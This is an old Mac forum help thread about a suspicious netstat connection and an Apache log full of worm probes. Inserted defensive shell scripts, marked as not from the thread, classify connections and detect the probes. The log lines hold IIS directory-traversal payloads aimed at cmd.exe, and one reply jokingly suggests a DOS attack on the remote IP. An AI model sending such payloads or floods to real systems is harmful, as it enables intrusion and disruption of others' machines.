Do I have a Russkie on my machine?
Dedicated MacNNer
Join Date: Oct 2000
Location: Alpharetta, GA
Anyone know what this is (from a netstat query)?
Code:
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 *.49185 *.* LISTEN
tcp4 0 0 10.0.1.3.49176 213.248.29.147.http ESTABLISHED
The 213 IP is from Russia. I just restarted my machine, I have Apache on. How can I kick him off?
Thanks for any help.
Senior User
Join Date: Jul 2000
Originally posted by MasonMcD:
Anyone know what this is (from a netstat query)?
Code:
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 *.49185 *.* LISTEN
tcp4 0 0 10.0.1.3.49176 213.248.29.147.http ESTABLISHED
The 213 IP is from Russia. I just restarted my machine, I have Apache on. How can I kick him off?
Thanks for any help.
Turn Apache off.
Enable a custom config for ipfw and deny his IP block.
Perform a DOS attack on his IP.
Senior User
Join Date: Jul 2000
Actually, now that I look at it... Isn't it your machine that is connecting to him? If it was his connecting to you, it would be on port 80 (.http) on the local machine.
[edit]
Yup:
Code:
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 222 192.168.1.2.63116 213.248.29.147.http ESTABLISHED
You, for some reason, are connecting to him.
Mac Elite
Join Date: Jan 2001
Location: L.A., CA
You, for some reason, are connecting to him.
Hehe 
Dedicated MacNNer
Join Date: Oct 2000
Location: Alpharetta, GA
But I actually restarted the machine via ssh. The browser's not even running.
Wow. Just looked at my httpd log. Maybe I should set up my firewall now.
Code:
66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe$
66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
Mac Elite
Join Date: Oct 2001
Location: Enschede
Seems indeed like a pretty good idea. Or maybe even a slight little bit too late.
If it is easy to start from scratch (for instance, a big backup drive), then I would recommend that option.
iMac G5 2.0 Ghz 20", 2 GB RAM, 400 GB, OS X 10.4.5, iPod with color screen 60 GB
Senior User
Join Date: May 2001
Originally posted by MasonMcD:
But I actually restarted the machine via ssh. The browser's not even running.
Wow. Just looked at my httpd log. Maybe I should set up my firewall now.
Code:
66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe$
66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
Heh. No need. Those are just IIS exploits. Use lsof to find out what process is bound to that port, though.
Senior User
Join Date: Jul 2000
Originally posted by MasonMcD:
But I actually restarted the machine via ssh. The browser's not even running.
Well, that may be so, but netstat isn't going to lie about who is connecting to whom. Your machine was accessing the 213.248.29.147 IP address on *their* port 80, not the other way around. So, it would be good to see what process was running that was initiating that connection.
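To make the direction check above mechanical, and to get to the lsof step that both replies ask for, here is an added shell example that is not from any poster in the thread. The sample rows are constructed from the netstat output quoted in the thread plus one made-up inbound row; the service-name mapping and the port-1024 heuristic are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): classify rows of BSD/macOS
# `netstat -an` output by connection direction, then print the lsof
# command that names the process holding the socket.  Addresses are host.port.

# Constructed sample modelled on the thread's output; the third row is a
# made-up inbound web client so that both directions appear.
SAMPLE='tcp4 0 0 *.49185 *.* LISTEN
tcp4 0 0 10.0.1.3.49176 213.248.29.147.http ESTABLISHED
tcp4 0 0 10.0.1.3.http 198.51.100.7.52311 ESTABLISHED'

# Numeric port of "host.port".  netstat without -n prints service names, so
# map the common ones and treat any other name as a well-known port (0).
port_of() {
    p=${1##*.}
    case $p in
        http) echo 80 ;;  https) echo 443 ;;  ssh) echo 22 ;;
        *[!0-9]*|'') echo 0 ;;
        *) echo "$p" ;;
    esac
}

# Prints listening | outbound | inbound | other for one netstat row.
# Heuristic: the peer on the low, well-known port is the server, so an
# ephemeral local port talking to a remote low port means this host dialed out.
classify_conn() {
    case $3 in
        LISTEN) echo listening; return ;;
        ESTABLISHED) ;;
        *) echo other; return ;;
    esac
    lport=$(port_of "$1"); rport=$(port_of "$2")
    if [ "$lport" -ge 1024 ] && [ "$rport" -lt 1024 ]; then echo outbound
    elif [ "$lport" -lt 1024 ] && [ "$rport" -ge 1024 ]; then echo inbound
    else echo other; fi
}

# Command to run on the live machine to see which process owns a socket to
# the given peer (-n/-P keep output numeric; -i@host selects by peer address).
lsof_for_peer() { echo "lsof -nP -i@${1%.*}"; }

report() {
    printf '%s\n' "$SAMPLE" | while read -r proto rq sq laddr raddr state; do
        kind=$(classify_conn "$laddr" "$raddr" "$state")
        printf '%-9s %s -> %s\n' "$kind" "$laddr" "$raddr"
        if [ "$kind" = outbound ]; then
            printf '          check: %s\n' "$(lsof_for_peer "$raddr")"
        fi
    done
}

report
```

Run it on real output with `netstat -an | grep -E 'LISTEN|ESTABLISHED'` piped in place of the sample, then run the printed lsof line as root.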
Mac Enthusiast
Join Date: Apr 2001
Location: Camarillo, CA
Russkie? Is that anywhere near the Any Key???
Ambrosia - el Presidente
Join Date: Sep 2000
Location: Rochester, NY
Originally posted by MasonMcD:
But I actually restarted the machine via ssh. The browser's not even running.
Wow. Just looked at my httpd log. Maybe I should set up my firewall now.
Yes, setting up a firewall for any machine on a public network (which the Internet is) is a good idea. However, a firewall wouldn't prevent this -- it is just a worm attempting to propagate using known IIS security holes.
It is likely that the person who owns this computer doesn't even know this is going on.
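As an added example that is not from the thread, a shell script that flags the kind of encoded-traversal probe shown in the quoted httpd log and counts them per source address, so the noise can be recognised for what it is. The sample log is two lines copied from the thread plus one constructed benign request; the pattern list is an assumption based on the variants visible in that log.

```shell
#!/bin/sh
# Added example (not from the thread): pick out IIS directory-traversal
# probes in an Apache access log and count them per source address.
# The matched patterns are the encoded "..\" / "../" forms (%255c, %c0%af,
# %c1%1c, ...) aimed at winnt/system32/cmd.exe; Apache on OS X has no such
# path and answers 404, so these lines are evidence of scanning, not compromise.

# Sample: two lines copied from the thread, one benign line constructed.
LOG='66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
198.51.100.7 - - [06/Mar/2003:10:35:00 -0500] "GET /index.html HTTP/1.0" 200 1234'

# True when one log line is an IIS traversal probe: a request for cmd.exe or
# root.exe, or ".." followed by a (double-)encoded backslash/slash or one of
# the overlong UTF-8 forms seen in the quoted log (assumed pattern list).
is_iis_probe() {
    printf '%s\n' "$1" |
        grep -Eiq '(cmd|root)\.exe|\.\.%(25)?(5c|2f|c0%af|c0%2f|c1%1c|c1%9c)'
}

# Reads log lines on stdin, prints the number of probe lines.
count_iis_probes() {
    n=0
    while IFS= read -r line; do
        if is_iis_probe "$line"; then n=$((n + 1)); fi
    done
    echo "$n"
}

# Reads log lines on stdin, prints "count ip" for each probing source,
# busiest first (the client IP is the first field of the combined log format).
probe_sources() {
    while IFS= read -r line; do
        if is_iis_probe "$line"; then printf '%s\n' "${line%% *}"; fi
    done | sort | uniq -c | sort -rn
}

printf '%s\n' "$LOG" | probe_sources
```

On a live server, replace the sample with `probe_sources < /var/log/httpd/access_log`; a source that only ever draws 404s for these paths is a scanner to note, not an intrusion to clean up.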